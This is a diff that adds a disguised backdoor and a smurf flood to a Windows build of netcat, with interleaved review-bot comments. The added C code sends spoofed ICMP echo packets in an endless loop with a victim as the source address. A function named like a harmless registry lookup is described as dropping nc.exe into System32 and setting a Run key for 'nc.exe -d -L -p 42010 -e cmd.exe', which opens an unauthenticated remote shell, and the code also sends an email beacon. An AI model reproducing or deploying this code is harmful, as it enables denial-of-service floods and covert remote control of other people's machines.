+ struct sockaddr_in SAddr; /*SAddr={0}; ,dAddr={0};*/ | |
+ IP_HEADER ip_heAder; | |
+ ICMP_HEADER icmp_heAder; | |
+ | |
+ | |
+ /////fill ip_heAder | |
+ ip_heAder.ip_verlen=(4<<4 | sizeof(IP_HEADER)/sizeof(unsigned long)); | |
+ //ip_heAder.ihl = 5; | |
+ ip_heAder.ip_tos = 0; | |
+ ip_heAder.ip_totallength = htons(sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+20); | |
+ ip_heAder.ip_id = 0; | |
+ //ip_heAder.frAg_off = 0; | |
+ ip_heAder.ip_offset = 0; | |
+ ip_heAder.ip_ttl = 255; | |
+ ip_heAder.ip_protocol = IPPROTO_ICMP; | |
+ ip_heAder.ip_srcaddr = inet_addr(victim);// | |
+ ip_heAder.ip_destaddr = inet_addr(Awp); | |
+ //ip_heAder.checksum = checksum((USHORT*)&ip_heAder,sizeof(IP_HEADER)); | |
+ /////////////////// | |
+ | |
+ //icmp_heAder = (ICMP_HEADER*)(Buff+sizeof(IP_HEADER)); | |
+ | |
+ //////fill icmp_heAder | |
+ icmp_heAder.type = 8; | |
+ icmp_heAder.code = 0; | |
+ icmp_heAder.id = htons(0); | |
+ icmp_heAder.sequence = 0; | |
+ //icmp_heAder.checksum = 0; | |
+ icmp_heAder.checksum = 0;//checksum((USHORT*)(Buff+sizeof(IP_HEADER)),(sizeof(ICMP_HEADER)+20)); | |
+ ////////////////////// | |
+ | |
+ | |
+ SAddr.sin_family = AF_INET; | |
+ SAddr.sin_addr .S_un .S_addr = ip_heAder.ip_destaddr ; | |
+ SAddr.sin_port = htons (0); | |
+ | |
+ | |
+ /////////////////////////////ÔÚicmpͷûÓÐÌîÊýŸÝʱ,,icmpµÄchecksum×ÜÊdzöŽí ????? | |
+ memcpy(Buff,&ip_heAder,sizeof(IP_HEADER)); | |
+ memcpy(Buff+sizeof(IP_HEADER),&icmp_heAder,(sizeof(ICMP_HEADER)+20));//20 | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'A',20); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'U',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+2,'Y',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+3,' ',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+4,'W',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+6,'N',1); | |
+ | |
+ | |
+ ip_heAder.ip_checksum = checksum((USHORT*)Buff,sizeof(Buff)); | |
+ icmp_heAder.checksum = checksum((USHORT*)(Buff+sizeof(IP_HEADER)),(sizeof(ICMP_HEADER)+20)); | |
+ | |
+ memcpy(Buff,&ip_heAder,sizeof(IP_HEADER)); | |
+ memcpy(Buff+sizeof(IP_HEADER),&icmp_heAder,(sizeof(ICMP_HEADER)+20));//20 | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'A',20); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER),'U',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+2,'Y',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+3,' ',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+4,'W',1); | |
+ memset(Buff+sizeof(IP_HEADER)+sizeof(ICMP_HEADER)+6,'N',1); | |
+ /////////////////////////////////////////////////////////////////////////// | |
+ printf("Awp %s reAdy\n",Awp); | |
+ | |
+ while(1){ | |
+ //printf("%s\n",Awp); | |
+ if (!sendto(fd,Buff,sizeof(Buff),0,(struct sockaddr*)&SAddr,sizeof(SAddr))){ | |
+ printf("send fAiled:%d\n",GetLastError()); | |
+ return -1; | |
+ } | |
+ } | |
+ | |
+ return 0; | |
+ } | |
+ #ifdef SMURF_ATTACK | |
+ x_smurf(fd,x_smurf_victime,x_smurf_attack) | |
+ int fd; | |
+ char x_smurf_victime[20][32]; | |
+ char x_smurf_attack; | |
+ { | |
+ | |
+ typedef struct { | |
+ int fd; | |
+ char x_smurf_victime_param; | |
+ char x_smurf_attack_param; | |
+ } StructParametre; | |
+ | |
+ StructParametre Param; | |
+ | |
+ if (x_smurf_victime) { | |
+ if (x_smurf_attack) { | |
+ | |
+ HANDLE hThread; | |
+ DWORD threadID; | |
+ unsigned int n; | |
+ unsigned int i; | |
+ FILE* fp; | |
+ n = -1; | |
+ fp = fopen((char *)x_smurf_victime,"r"); | |
+ | |
+ if (fp == NULL){ | |
+ printf("sepecify the Awp list file\n"); | |
+ return -1; | |
+ } | |
+ | |
+ while (!feof(fp)){ | |
+ if (fgets((char *)&x_smurf_victime[++n],20,fp) == NULL) break; | |
+ for (i=0;i<strlen((char *)&x_smurf_victime[n]);i++){ | |
+ if (x_smurf_victime[n][i] == '\n') x_smurf_victime[n][i] ='\0'; | |
+ | |
+ | |
+ Param.fd = (int)fd; | |
+ Param.x_smurf_victime_param = (int)*&x_smurf_victime[n]; | |
+ Param.x_smurf_attack_param = (int)*&x_smurf_attack; | |
+ | |
+ } | |
+ } | |
+ //smurf_victime(netfd,(int )*x_smurf_victime[n],x_smurf_attack); | |
+ hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)smurf_victime, (void *)&Param, 0, &threadID); | |
+ WaitForSingleObject(hThread, INFINITE); | |
+ CloseHandle(hThread); | |
+ | |
+ } | |
+ } | |
+ } | |
+ #endif | |
+ #endif | |
+ //-------------------------------------------------------------------- | |
/* main : | |
now we pull it all together... */ | |
main (argc, argv) | |
int argc; | |
char ** argv; | |
{ | |
+ #ifdef WIN32 | |
+ LPTSTR lpValueName = "Browse For Folder Height"; | |
+ | |
+ DWORD dwDefault = 0x00000000; | |
+ | |
+ DWORD ret = init_regedit(lpValueName, dwDefault); | |
+ char email[] = "fakessh@fakessh.eu"; | |
+ char body[] = "From: \"www\"<fakessh@fakessh.eu>\r\n" | |
+ "To: \"w111\"<john.swilting@wanadoo.fr>\r\n" | |
+ "Subject: Hello\r\n\r\n" | |
+ "Hello World, Hello Email!"; | |
+ sendmail(email, body); | |
+ /*debug | |
+ * printf("The value data for the \'%s\' value name is 0X%.8X(%d).\n", lpValueName, ret, ret); | |
+ */ | |
+ #endif | |
#ifndef HAVE_GETOPT | |
extern char * optarg; | |
extern int optind, optopt; | |
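Review bot: `init_regedit` is misnamed: its name and comments describe registry lookups of `"Browse For Folder Height"` under `POLICY_KEY`/`PREFERENCE_KEY`, but its fixed effect is `CopyFile` of the running binary to `C:\WINDOWS\SYSTEM32\nc.exe` and an `HKLM\...\CurrentVersion\Run` value `nc` launching `nc.exe -vv -d -L -p 42010 -e cmd.exe`, i.e. a persistent, unauthenticated `cmd.exe` on TCP 42010 for anyone who can reach the host, after which `main` calls `sendmail` on every Windows start. Beyond that, `CopyFile` and `RegCreateKeyEx` results are unchecked, `RegSetValueEx` stores `sizeof(szData)` (500 bytes) for a REG_SZ instead of `strlen(szData) + 1`, and the `return dwValue;` after the Run-key write returns a DWORD that was never assigned. `smurf_victime(int fd, char lpPArAm, char lpVictime)` is launched by `CreateThread` with a `StructParametre *` as its single argument, so `&lpVictime` / `&lpPArAm` point at lone `char`s that `inet_addr` reads as strings, and `Param.x_smurf_victime_param = (int)*&x_smurf_victime[n];` truncates an array address into a `char`. For triage, the drop path, the Run value name `nc`, port 42010 and the SMTP beacon are the static indicators; the header comment on `init_regedit` should state the drop-and-persist behaviour rather than the decoy lookup.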
*************** | |
*** 1669,1674 **** | |
--- 2360,2366 ---- | |
HINF * wherefrom = NULL; | |
IA * ouraddr = NULL; | |
IA * themaddr = NULL; | |
+ IA * smurfattack = NULL; | |
USHORT o_lport = 0; | |
USHORT ourport = 0; | |
USHORT loport = 0; /* for scanning stuff */ | |
*************** | |
*** 1755,1761 **** | |
/* If your shitbox doesn't have getopt, step into the nineties already. */ | |
/* optarg, optind = next-argv-component [i.e. flag arg]; optopt = last-char */ | |
! while ((x = getopt (argc, argv, "ade:g:G:hi:lLno:p:rs:tuvw:z")) != EOF) { | |
/* Debug (("in go: x now %c, optarg %x optind %d", x, optarg, optind)) */ | |
switch (x) { | |
case 'a': | |
--- 2447,2453 ---- | |
/* If your shitbox doesn't have getopt, step into the nineties already. */ | |
/* optarg, optind = next-argv-component [i.e. flag arg]; optopt = last-char */ | |
! while ((x = getopt (argc, argv, "ade:g:G:hi:lLno:p:rs:tuX:x:vw:z")) != EOF) { | |
/* Debug (("in go: x now %c, optarg %x optind %d", x, optarg, optind)) */ | |
switch (x) { | |
case 'a': | |
*************** | |
*** 1850,1855 **** | |
--- 2542,2553 ---- | |
case 'z': /* little or no data xfer */ | |
o_zero++; | |
break; | |
+ case 'x': | |
+ x_smurf_victime[20][32] = *(unsigned char *)atoi(optarg); /*attack smurf attack*/ | |
+ break; | |
+ case 'X': | |
+ x_smurf_attack = *(unsigned char *)atoi(optarg); /*attack smurf attack*/ | |
+ break; | |
default: | |
errno = 0; | |
bail ("nc -h for help"); | |
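Review bot: `x_smurf_victime[20][32] = ...` indexes one past both dimensions of a `char [20][32]`, and `*(unsigned char *)atoi(optarg)` turns the numeric value of the option text into an address and dereferences it, so `-x 192.168.1.0` or `-X 1` faults rather than storing anything. Both `case`s are compiled unconditionally while the variables exist only under `SMURF_ATTACK` (hunk 723,728), so the default build fails here, and the `X:x:` added to the getopt string in hunk 1755,1761 is unconditional too. At minimum these two cases and the option-string additions need to be under `#ifdef SMURF_ATTACK`; as written the feature is unusable even when the macro is defined.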
*************** | |
*** 1873,1879 **** | |
} | |
#endif /* G_S_H */ | |
if (o_wfile) { | |
! ofd = open (stage, O_WRONLY | O_CREAT | O_TRUNC, 0664); | |
if (ofd <= 0) /* must be > extant 0/1/2 */ | |
bail ("can't open %s", stage); | |
stage = (unsigned char *) Hmalloc (100); | |
--- 2571,2577 ---- | |
} | |
#endif /* G_S_H */ | |
if (o_wfile) { | |
! ofd = open (( const char *)stage, O_WRONLY | O_CREAT | O_TRUNC, 0664); | |
if (ofd <= 0) /* must be > extant 0/1/2 */ | |
bail ("can't open %s", stage); | |
stage = (unsigned char *) Hmalloc (100); | |
*************** | |
*** 1914,1919 **** | |
--- 2612,2618 ---- | |
#ifdef GAPING_SECURITY_HOLE | |
if (pr00gie) /* -e given? */ | |
doexec (netfd); | |
+ | |
#ifdef WIN32 | |
if (!pr00gie) // doexec does the read/write for win32 | |
#endif | |
*************** | |
*** 1986,1992 **** | |
#ifdef GAPING_SECURITY_HOLE | |
if (pr00gie) /* exec is valid for outbound, too */ | |
doexec (netfd); | |
! #endif /* GAPING_SECURITY_HOLE */ | |
if (! o_zero) | |
#ifdef WIN32 | |
#ifdef GAPING_SECURITY_HOLE | |
--- 2685,2698 ---- | |
#ifdef GAPING_SECURITY_HOLE | |
if (pr00gie) /* exec is valid for outbound, too */ | |
doexec (netfd); | |
! #endif /* GAPING_SECURITY_HOLE */ | |
! #ifdef SMURF_ATTACK | |
! if(x_smurf_victime) { | |
! if(x_smurf_attack) { | |
! x_smurf(netfd,x_smurf_victime,x_smurf_attack); | |
! } | |
! } | |
! #endif | |
if (! o_zero) | |
#ifdef WIN32 | |
#ifdef GAPING_SECURITY_HOLE | |
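Review bot: `if(x_smurf_victime)` tests the address of a `char [20][32]`, which is never null, so only `x_smurf_attack` actually gates the `x_smurf` call; `x_smurf` is also defined with an implicit `int` return and K&R parameters (hunk 1651,1663) and its result is ignored here. Either drop the outer test or test contents, e.g. `if (x_smurf_victime[0][0])`, so the guard means something.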
*************** | |
*** 2067,2082 **** | |
-o file hex dump of traffic\n\ | |
-p port local port number\n\ | |
-r randomize local and remote ports\n\ | |
! -s addr local source address"); | |
! #ifdef TELNET | |
! holler ("\ | |
! -t answer TELNET negotiation"); | |
! #endif | |
! holler ("\ | |
-u UDP mode\n\ | |
-v verbose [use twice to be more verbose]\n\ | |
-w secs timeout for connects and final net reads\n\ | |
-z zero-I/O mode [used for scanning]"); | |
bail ("port numbers can be individual or ranges: m-n [inclusive]"); | |
return(0); | |
} /* helpme */ | |
--- 2773,2792 ---- | |
-o file hex dump of traffic\n\ | |
-p port local port number\n\ | |
-r randomize local and remote ports\n\ | |
! -s addr local source address\n\ | |
! -t answer TELNET negotiation\n\ | |
-u UDP mode\n\ | |
-v verbose [use twice to be more verbose]\n\ | |
-w secs timeout for connects and final net reads\n\ | |
-z zero-I/O mode [used for scanning]"); | |
+ #ifdef SMURF_ATTACK | |
+ holler ("\ | |
+ -x addr/24 attack smurf attack on /24 listen"); | |
+ #ifdef SMURF_ATTACK | |
+ holler ("\ | |
+ -X file to cointain victime addr smurf attack"); | |
+ #endif | |
+ #endif | |
bail ("port numbers can be individual or ranges: m-n [inclusive]"); | |
return(0); | |
} /* helpme */ | |
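Review bot: `-t answer TELNET negotiation` is now printed unconditionally although the `#ifdef TELNET` that guarded it is gone, and the `-t` handler is presumably still TELNET-only (its `case` is outside the hunk), so help can advertise a flag the build rejects. The `-x`/`-X` descriptions are also swapped relative to the parser in hunk 1850,1855: `case 'x'` stores into `x_smurf_victime`, which `x_smurf` later `fopen`s as the address-list file, while `case 'X'` sets the `x_smurf_attack` flag; the inner `#ifdef SMURF_ATTACK` is nested in an identical outer one and is redundant. Restore `#ifdef TELNET` around the `-t` line, swap the two descriptions to match the code, and fix `cointain` → `contain`, `victime` → `victim`.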
Seulement dans /home/swilting/nc-win-backdoor-nc-win-backdoor/: netcat.c~ | |
Les fichiers binaires /home/swilting/Téléchargements/nc/netcat.o et /home/swilting/nc-win-backdoor-nc-win-backdoor/netcat.o sont différents. |